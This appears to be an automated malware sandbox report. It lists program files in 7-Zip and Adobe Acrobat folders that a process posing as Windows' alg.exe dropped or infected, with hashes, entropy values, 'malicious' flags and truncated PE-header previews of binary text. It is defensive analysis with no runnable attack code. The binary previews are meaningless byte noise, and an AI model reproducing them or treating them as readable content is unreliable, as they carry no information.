SSDEEP:	24576:vBpDRmi78gkPXlyo0Gtjr1sqjnhMgeiCl7G0nehbGZpbD:5NRmi78gkPX4o0GtjVDmg27RnWGj
MD5:	639A908E07A3728AD2FA477C3DF48614
SHA1:	B7B7F3756C0F3FE413B0FAB549F9297EAC026E53
SHA-256:	8F76BB0CF5A409DA1B985C91131CF1335B00EA47356583F003604B13C1DC06DC
SHA-512:	0CCC6C0E28CD12E3DB2F7C171D75E5EA6E1FE75E0AEC4F1E90EE529146710236353C8E635563282371DF06D1A0806ECF4E888A087DD9E632FBB4A418CE5C20B9
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\..2..2..2.0.\..2..I..2..3..2..O..2..\.D.2...6..2.._..2..N..2..J..2.Rich.2.........................PE..d....\.d.........."......b...8......Pi........@........................................... .................................................P................... .......................................................................(.......@....................text....a.......b.................. ..`.rdata...i.......j...f..............@..@.data...............................@....pdata.. ...........................@..@.rsrc...............................@..@.reloc...............r..............@...........................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\7zG.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1282048
Entropy (8bit):	7.229056226367696
Encrypted:	false
SSDEEP:	24576:XLOS2oTPIXVysqjnhMgeiCl7G0nehbGZpbD:B/TtDmg27RnWGj
MD5:	9C48E294ED6D833F6679515D91808F9D
SHA1:	ACAE19812098C2120A1E4D010B3269EA53E20F27
SHA-256:	58C9472CA6AEE1275F185C6046F58CD6F513D920DE535AE246CE510D6BCDD904
SHA-512:	0CA337D44E1AE4FD18A3E63E5E1BE87812F4DE9F6D8421BC84178753268E9161A9E61848FA2D46C85D1995349AAB23481D49E3AEED7A69F551E1455C4F6E42EF
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.VS.y8..y8..y8...C.jy8..y9..y8...E.}y8...V..y8.i.<.~y8...U.ky8...;.~y8...D.~y8...@.~y8.Rich.y8.........PE..d....\.d.........."......&..........."........@......................................o.... ..............................................................d...........................................................................@...............................text...4$.......&.................. ..`.rdata..Ts...@...t...*..............@..@.data...83..........................@....pdata..............................@..@.rsrc....d.......f...:..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\Uninstall.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1145344
Entropy (8bit):	5.031191272765625
Encrypted:	false
SSDEEP:	12288:f1MXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:f1MsqjnhMgeiCl7G0nehbGZpbD
MD5:	81E7A5A0364EEDE5E07DE648CDAAE788
SHA1:	C6B520260FEAD62D82130BFAF619AB2ECE1E5C24
SHA-256:	38254F572FE836B790069B92FFB7E0D945AA3D89C700FA74FD690EF82E0EC134
SHA-512:	C43C0CE6F7761DF8BCCF62E6D54357C054699A29B58BF59D980F5A3F3BA296DBBCBD5BB2FB02AADDF7D022A08D890959439E5562E3BD4BA3AB9E9F98FD260747
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../..........@......f!.......0....@.................................]+......................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc....`...`...P...*..............@...........................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1222656
Entropy (8bit):	6.712002891148768
Encrypted:	false
SSDEEP:	12288:WRudzXXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:WAdzXsqjnhMgeiCl7G0nehbGZpbD
MD5:	3182850B32DEA9F810CE7E61E1B427D7
SHA1:	1CA8947E8DC23C48BE48754B28CB598C72A8C76F
SHA-256:	D03B47ADB3BAD8BD7029A7D9CCF0B76C1FB8F97E2D63D1BF7E46567E51ADB6C5
SHA-512:	E081161C15430399C428967A35CD976C45DE0BD6EAE9B58873FBC770C3923CD20568FC9607B20A93A2D9EA5A3E1A8ADB6D898245A15BEC9121352E1E529C2963
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4.F.4.F.4.F.LEF.4.FE@.G.4.FE@.G.4.FE@.G.4.FE@.G.4.F._.G.4.F.4.F%4.FG@.G.4.FG@)F.4.F.4AF.4.FG@.G.4.FRich.4.F................PE..d......d.........."......6.....................@.......................................... .....................................................\|....P..h........9.....................p.......................(...P...8............P...............................text....4.......6.................. ..`.rdata..>....P.......:..............@..@.data...............................@....pdata...9.......:..................@..@.rsrc...h....P......................@..@.reloc..............................@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1457664
Entropy (8bit):	5.082152504651986
Encrypted:	false
SSDEEP:	12288:vvbXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:rsqjnhMgeiCl7G0nehbGZpbD
MD5:	DB43714362B8A5D018B55D84CBEA6346
SHA1:	9E3E79844694030945EEF41A8ED8F49D4B4FFED5
SHA-256:	415A65A1DF89199FF82071FCC711CED00C7D8959291BD9B8AD4B883714441C03
SHA-512:	26108B83F8B4E0C6CDB0442E093531282004467BAFD28F096B4193C2F925C42A4942E9EFF913814C2BAE9D7E4BE1B74DB385B7827780D10229A7D14B3EB8F1D2
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......]../...\|...\|...\|B..}...\|B..}...\|...}...\|..S\|...\|..}=..\|..}...\|..}...\|..}...\|..=\|...\|o..\|...\|B..}...\|...\|...\|..}...\|..Q\|...\|..9\|...\|..}...\|Rich...\|................PE..d......d.........."......H...........&.........@......................................... .................................................@...,....@..........4......................T.......................(...@...8............`...............................text....G.......H.................. ..`.rdata.......`.......L..............@..@.data...............................@....pdata..4...........................@..@.CRT....@....0......................@..@.rsrc........@......................@..@.reloc...P...P...@..................@...................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1461248
Entropy (8bit):	5.46860816360811
Encrypted:	false
SSDEEP:	24576:d5zhM1XSEesqjnhMgeiCl7G0nehbGZpbD:pMsrDmg27RnWGj
MD5:	CD8D379286EC4260404E93511DD61B4D
SHA1:	3106238725D1FC4C93B504C48F02A68F07F179DB
SHA-256:	B62199B265A93F5831C2607C65FF1ADC1BB0AF1640D362045CB7030E3D78B4EC
SHA-512:	F86556496DE515D9DF1CA560E29749B85CC5AA6A1FCC08D39A791BF630C5A3C4CDD05BD0A46498315D47496F1B6D7ECA6CE3A65BF77B861FC5241125BAFC1F08
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........<$.Rw.Rw.Rw...w..Rw5.Vv.Rw5.Qv.Rw5.Sv.Rw7.Sv.Rw..Vv.Rw..Tv.Rw..Sv..Rw.Sw..Rw5.Wv.Rw.t/w.Rw.t?w..Rw7.Wv.Rw7.Vv.Rw7.w.Rw..w.Rw7.Pv.RwRich.Rw........PE..d......d.........."..........z......@..........@.....................................t.... ................................................. A...................+......................T.......................(.......8............................................text............................... ..`.rdata..............................@..@.data....d...`...\...T..............@....pdata...+.......,..................@..@.rsrc............0..................@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4151808
Entropy (8bit):	6.499775579159837
Encrypted:	false
SSDEEP:	49152:EtuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN755xDmg27RN:EjEIa4HIEWOc53D527BWG
MD5:	A00C6EC4B0930B3F4A442D704E0A0F47
SHA1:	5AF7A7967DC05DA4D1A19513723992C087E90357
SHA-256:	8E7F56BCB80FECCFE8EEC9E81D99B8E2931FD785F59C8D054AB6EBB7D8862A03
SHA-512:	A43A73559965F7174B23D372021226FD5A17E48CA3FF573D27A8B15B6EC207FA1C5335DF52A29A84D1018EE674C432ED0E8B2FD7ADBD81DDF0AD6AAE9CDD1169
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.....F @... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	59941376
Entropy (8bit):	7.999367300919114
Encrypted:	true
SSDEEP:	1572864:EQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:7XhwMhe6AABPiQwF6xQ22R
MD5:	12B526590422A335FD9F6F3B1FABF5C9
SHA1:	DC8BF8C4DC04BAF3E3FA7855A7103004C1D9AF5C
SHA-256:	010B6DE069199DBD8550E96A3EB1E586B4436182C7969203E5475B1A3515815D
SHA-512:	D542183B218E9A87679703B842D61E3DB22E5A14E335450FBCBC24AD87EE8BDE14D36AD8B0F6AF4AF2368EA755C701364301BE556D19D6827861B6D9206B618C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0......2..... .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1180160
Entropy (8bit):	5.084794381325986
Encrypted:	false
SSDEEP:	12288:PWrXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:PusqjnhMgeiCl7G0nehbGZpbD
MD5:	509E30FD3A0F3F82F5305DDA74C9C7DC
SHA1:	2925B7BD5F4B455A02A4B23B64D331A7010CAA2A
SHA-256:	EFD2221658DC61205760967B832D079E7D205A9E284D6B1A60FFFF6213934456
SHA-512:	816E7C6ACD3F59CFFF80090E1C8CAE559A40217EABBE3FF7A64F42151AD247EC9883C5DF9B53E5C2669542262ECA73399326FEB48BAF51057EF46EB301EC0476
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e....b..b..b.\|...b.epf..b.epa..b.epg..b.epc..b.oc..b..c.2.b.gpg..b.gp...b.....b.gp`..b.Rich..b.................PE..d...R..d.........."......l...Z.......m.........@.............................@............ .....................................................\|.......p.......@.......................T.......................(.......8............................................text...>k.......l.................. ..`.rdata..J:.......<...p..............@..@.data...............................@....pdata..@...........................@..@.rsrc...p...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6210048
Entropy (8bit):	6.386703064822595
Encrypted:	false
SSDEEP:	49152:hDvZEaFVUn+Dpasot2xQevgjCGT7lmPIionqOgBhGl6zVLkVEk3yV07U24GEQTXp:SnN9KfxLk6GEQTX5UKzNDQD527BWG
MD5:	EEBBBD8B9F7A198BDF0616983F68C3F7
SHA1:	C6153AC88DBF0363904B8CC81BF095AFB76DC3DC
SHA-256:	B0644FD041ABD24439EA1FBFBF861867906305EAE6737617D42C0ED064A5EC79
SHA-512:	DEB8832F913F80C0F9386F980DF7313D2A41973DF1A5B35913DAF5EDB337F5C6251E39EB7487054D7880A11DAE8E96A805228BC82EF397E06A32FAFC51C3FF99
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......;..j...9...9...9k..8r..9k..8...9...8l..9...8t..9..p9\|..9...9...9...8...9k..8\..9k..8}..9k..8n..9...9...9...8Y..9...8~..9..r9~..9...9\|..9...8~..9Rich...9........................PE..d......d.........."......V4..,"......L(........@.............................._......._... ..........................................<F.\|....EF.x....0K..V...@H......................n;.T....................o;.(....:.8............p4..... .F.`....................text...,T4......V4................. ..`.rdata..@....p4......Z4.............@..@.data...l.....F......nF.............@....pdata.......@H......vG.............@..@.didat.. .....K......>J.............@..._RDATA....... K......HJ.............@..@.rsrc....V...0K..X...JJ.............@..@.reloc...0....V.. ....U.............@...................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1157120
Entropy (8bit):	5.041483554006955
Encrypted:	false
SSDEEP:	12288:q2Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:q2sqjnhMgeiCl7G0nehbGZpbD
MD5:	D6DC4560C225998D7FE1560F9A627750
SHA1:	E9A9E0897212334B78C2CA8518B0491F3143039F
SHA-256:	518C018BE67987143897DEEF029869108BA772ADA36BE9CC7E4216F93EA8FFB9
SHA-512:	230D713E5A819BC83B38A23CAFC96921BF3BB2A542BF6612C7D1472F6DF233737528EC630B245462A88CABCE12AA5C273766E7FAB77EC678377F6372BD67B2F4
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.tKx...x...x...q..t.......c.......r.......{.......~...l...}...x...........\|.......y...x...y.......y...Richx...................PE..d......d.........."..........>.......0.........@....................................A..... .................................................lV..........h...........................PI..T....................K..(....I..8............@...............................text....,.......................... ..`.rdata..4"...@...$...2..............@..@.data........p.......V..............@....pdata...............X..............@..@.rsrc...h............\..............@..@.reloc...P.......@...h..............@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12039168
Entropy (8bit):	6.596677792680047
Encrypted:	false
SSDEEP:	98304:Nb+MzPstUEHInwZk3RBk9DdhgJCudq1uVIyESYgKBD527BWG:xnPgTHIwZoRBk9DdhSUEVIXgKBVQBWG
MD5:	C0DB1C529C56B3AEEA8547ABD1A7A70D
SHA1:	108BB6D164AC26B49187A595E2E60C501B637BCD
SHA-256:	810AD9CB9BBA50F0106F9182C27EACB0D4982B1BDF69B7DAB3623A1E6443C135
SHA-512:	21E89B1EB254E0C18E14EC48C9E05E6CC35A29F91179E5C7C2AFB7760D5AE93FED611099A80CF39159E44D0577CCE151600D25B1182FD1D64E7C94887E396DAB
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......&.w.bb..bb..bb..v...lb..v...b.....qb.....hb......ab......b..E.t.Vb..E.d.jb.....ib......b..v...\|b..v...cb.....`..bb..}b..v...Ab..bb..,`.....b.....cb.....cb..bb..`b.....cb..Richbb..........PE..d......d..........".........../.....0.F........@......................................... ............................................\...,..h........G......Lz..................P..T......................(......8...........................................text............................... ..`.rdata..f. .......!.................@..@.data..............................@....pdata..Lz.......\|.................@..@.didat...............X..............@..._RDATA...............Z..............@..@.rsrc....G.......H...\..............@..@.reloc... .........................@...........................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1322496
Entropy (8bit):	5.281814811498312
Encrypted:	false
SSDEEP:	24576:Vg5FvCPusNsqjnhMgeiCl7G0nehbGZpbD:yftmDmg27RnWGj
MD5:	4E29357EF81FFEF4487A703207CAEF64
SHA1:	3F54481ED797D99299CF4AF77158E8D868E947BA
SHA-256:	2E9124C13EA1AA7C73E4AD463B5BF4304F9B417901E14030FBCBF9440F8679A3
SHA-512:	CD50E5690CEC3F6D4E32C55A0E79FA89D5EB4A24665B2883D4FB8F72B944B1D044E52E5204832BFB176D7FD33CFCF4A76718C4FD4C3238391128023948B8AA95
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ z.A...A...A...9...A..O5...A..O5...A..O5...A..O5...A...*...A...A...@..M5...A..M5.A...A...A..M5...A..Rich.A..................PE..d......d.........."..........b.................@.............................p......04.... .................................................X...h....p..p....P..t.......................T.......................(.......8............................................text...,........................... ..`.rdata.............................@..@.data........@.......&..............@....pdata..t....P......................@..@.rsrc...p....p.......B..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1339904
Entropy (8bit):	7.208888566408563
Encrypted:	false
SSDEEP:	24576:8jKTIsAjFuvtIfmFthMaT5U8aChaeuPsqjnhMgeiCl7G0nehbGZpbD:8jIMmPh7TT79uDmg27RnWGj
MD5:	DFB4AEF4E17CAC320D023E6D0BDE3608
SHA1:	EBEF67BD3A22EC217DCFF6A89460FF20A9AC54BA
SHA-256:	E1424F46D4EF678B45B00387B454E267C1C014FED3DFBCA277335D43E5BAEA13
SHA-512:	C68F1FC4F14C1DC5150B17EECCA59214CE80C188A508DB5B21274BDA8D5DFE5B4B05013CF3D0AF5FE99431EC56DE07CC34C41FB2CBB0BE3616F04E988B52D33E
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$......................................s...X............................[....U=....................h...n......n.Y.....1....n......Rich...........PE..d......c..........".................0i.........@..............................$.....W..... .................................................H...d............@..Tx......................p...................`...(...`................................................text............................... ..`.rdata..@...........................@..@.data....>......."..................@....pdata..Tx...@...z..................@..@.rsrc................z..............@..@.reloc..............................@...................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1515520
Entropy (8bit):	5.411764925317414
Encrypted:	false
SSDEEP:	24576:TGqVwCto1Gm5Wg7sqjnhMgeiCl7G0nehbGZpbD:iZ1GmUgDmg27RnWGj
MD5:	82A7BC1B93DD546C21CFFBDC2AFBC0F2
SHA1:	ACB4A3BC8B65E684F40440F42E3D491B9C90B89E
SHA-256:	2B7E6FD104B451EE0B9D5C676840DB69BDAF8DB2CB99D95AD9C25022C516A6A9
SHA-512:	F804963B963C96EBAC4B1DC5215EB070B8BA94639DDDA7E495C1AC05C445A1F17D64BC7DEB8690697E64B01FE5C18E069287E52AE5E2B2A952D9C5D2C0025272
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................v......................................a..X.....X........r....X.....Rich...........PE..d......c.........."............................@....................................U..... .................................................. ...........v..............................p.......................(....................0...............................text............................... ..`.rdata..Z$...0...&..................@..@.data...x"...`.......@..............@....pdata...............L..............@..@.rsrc....v.......v...j..............@..@.reloc...P...0...@..................@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1253376
Entropy (8bit):	5.157400338692046
Encrypted:	false
SSDEEP:	12288:cWBWvXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:cWBWvsqjnhMgeiCl7G0nehbGZpbD
MD5:	94155AAB6CB0B60B3DF2B94248E39080
SHA1:	93094E35B173B5E6914D54BC8F05E8E81DF05CAD
SHA-256:	DD978298EF0162BADF116ABAE1410F753C220DD630BDB5E48220B2C078C10D57
SHA-512:	7AD1ADAA8A3F2FAB53EB7D9540BCE2211488967EBF1B93B77821252651F4E4FF64E3B631B76A02BDE11E65D50BC19C11506CAFA6BBCEF646DABED695F4787840
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1.v.Pc%.Pc%.Pc%.(.%.Pc%C$g$.Pc%C$`$.Pc%C$f$.Pc%C$b$.Pc%.;g$.Pc%.;b$.Pc%.Pb%EPc%z$f$.Pc%z$.%.Pc%.P.%.Pc%z$a$.Pc%Rich.Pc%................PE..d...DC,d.........."............................@.............................`............ .................................................h...@.......@............................Q..T....................S..(... R..8............0...............................text............................... ..`.rdata..$....0......................@..@.data...............................@....pdata..............................@..@.rsrc...@...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1683968
Entropy (8bit):	7.228490055874191
Encrypted:	false
SSDEEP:	24576:pf9AiKGpEoQpkN2C4McuKo0GTNtpyT5RGeQa04sqjnhMgeiCl7G0nehbGZpbD:p+GtCi27mVTyT+a0kDmg27RnWGj
MD5:	3B7049C6109BE2E6026780EF80DCE1EC
SHA1:	9F31921DAA200170E223FD1C7E4AD9F9F6E4ED94
SHA-256:	BA3D192A61485E94F445937D25B1215FCB682AD41CB362353A317467E8D07E7C
SHA-512:	9C4BB5314C602757855A23194546EB052FFEC44EDE43F4A245AB18F91BA0EE032C1DD7E15EF1A2E2C5B7729D0DF2E9AE311262E61B0F10EC63DC9637D7866DBC
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........ ..N...N...N......N.e.K...N...O...N...J...N...M...N...H...N...K...N...#...N.<~3...N..C3...N...O...N...O.O.N...F...N.......N......N...L...N.Rich..N.................PE..d...%..c.........."......j...t......@..........@....................................=w.... .................................................x........... ....p..dt......................p.......................(... ...8............................................text...kh.......j.................. ..`.rdata...............n..............@..@.data...`S.......F..................@....pdata..dt...p...v...D..............@..@.rsrc... ...........................@..@.reloc..............................@...........................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3110912
Entropy (8bit):	6.649662566604278
Encrypted:	false
SSDEEP:	49152:pU198PzqkltcT0gViJNfBZQiOIK5Ns6YZ82PTJeYXDmg27RnWGj:+2NfHOIK5Ns6qR9dD527BWG
MD5:	A85750B39CA41892852C6174C5FB3DA9
SHA1:	392F550F1F0E0EBA3C4B1B7CCF251EB2237FD7CF
SHA-256:	5CFD35D1264646E7581723F8515FFFDE3ABD5CD1D43ED8E56D1063B768984B45
SHA-512:	8BF790C22B342E33833B805CB52919C6FB9755202236F4A2AD163A79BF3B121B727120E2EAD6E937282BA51146A2F365BB6DB6378C07CD8E41E19D22A11E8715
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......'A3rc ]!c ]!c ]!..!h ]!..!. ]!..!x ]!1UY r ]!1U^ i ]!.O.!a ]!..!g ]!..!b ]!1UX . ]!..!@ ]!.UX . ]!c \!.!]!.UT . ]!.U.!b ]!c .!b ]!.U_ b ]!Richc ]!................PE..d.....Zd..........".................t..........@..............................0.....oq0... ..................................................o .......&......$.`....................x..p....................y..(....)..8....................j .@....................text............................... ..`.rdata..8...........................@..@.data....q.... ..<...r .............@....pdata..`.....$.......#.............@..@_RDATA........&.......%.............@..@.rsrc........&.......%.............@..@.reloc...@....&..0...H&.............@...................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1588224
Entropy (8bit):	5.53192243393323
Encrypted:	false
SSDEEP:	24576:VkcWTUQcydLsqjnhMgeiCl7G0nehbGZpbD:VhKUcDmg27RnWGj
MD5:	46C00427403FDF2564DD3B19A798A003
SHA1:	AE9E942D2A7655EE73DD10144517881989C69128
SHA-256:	976DD43C535EE469ACCFA4AEEC67EE2D405312D26C82D7F4BA95DE087D6CEA9F
SHA-512:	EDF4D0BE250CE497A500827E688914C8870137B166CC850B12AAC1F9633F97B5A81F009BE7145ECC25DBBF5C6C3974CDDD047FC3D45CF25B904E13466915F33D
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0I..Q'..Q'..Q'..7#..Q'..7$..Q'..7".!Q'..$#..Q'..$$..Q'..7&..Q'..$"..Q'.x$"..Q'..Q&.dQ'.x$...Q'.x$...Q'..Q...Q'.x$%..Q'.Rich.Q'.........................PE..d.....Zd.........."......,..........(?.........@....................................yT.... .................................................(...P................m..................tC..p...........................p...8............@..........@....................text....+.......,.................. ..`.rdata......@.......0..............@..@.data....)..........................@....pdata...m.......n..................@..@_RDATA...............B..............@..@.rsrc................D..............@..@.reloc...`...@...P..................@...................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1338368
Entropy (8bit):	5.352662589378096
Encrypted:	false
SSDEEP:	12288:zfY+FUBoXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:zA+qBosqjnhMgeiCl7G0nehbGZpbD
MD5:	C65619538A409771E3487BFD6E7FE7EC
SHA1:	FB88CCC6D0CDC079EE1D5E06F0C94EB6EEA17872
SHA-256:	8F8B8905D654D8EB873B1F9AD57BF205E186DE61A92D2131CB549BA47286D160
SHA-512:	9E6323218780528076A6E99E930F366B9B3598DCA3016321C5510AD7BEC062369968687E31F09A22910D2FC6784C77F31525E6594EF943A5F75AB8CF933705D1
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..*...y...y...y...y...y..x...y..x...y..x...y..x-..y..Ey...yb.x...y...y..yN.x...yN.}y...yN.x...yRich...y........PE..L...<..[................. ...................0....@..................................J..............................................0...............................J..p....................K.......J..@............0...............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data....E.......B..................@....rsrc........0......................@..@.reloc...p...@...`..................@...................................................................................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1143296
Entropy (8bit):	5.022669351704859
Encrypted:	false
SSDEEP:	12288:NXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:NsqjnhMgeiCl7G0nehbGZpbD
MD5:	F8852DFC407C1DC619A7C8DAE83E3FFB
SHA1:	297718C28BF69027478C7CCBFC14F792B8962590
SHA-256:	4E117F66159F8FB5F408314791430EC005E56D96C6114A2A33FC5084FE03FA01
SHA-512:	F44553ACE345EF51C2B1FE70517FC35D5B6D23CFCEB8A75CD45FF61C26D4D291E04C86638EB233B35718F5486C5C0B45E7C53B4CCF0DDF3BFD830CBE4249C7B5
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................+.............................................................G.............Rich............................PE..d...~^.c.........."..........$......p..........@.......................................... ..................................................;.......p.......`......................d4..p............................4..8............0..0............................text...\|........................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata.......`......................@..@.rsrc........p.......0..............@..@.reloc...P.......@...2..............@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe

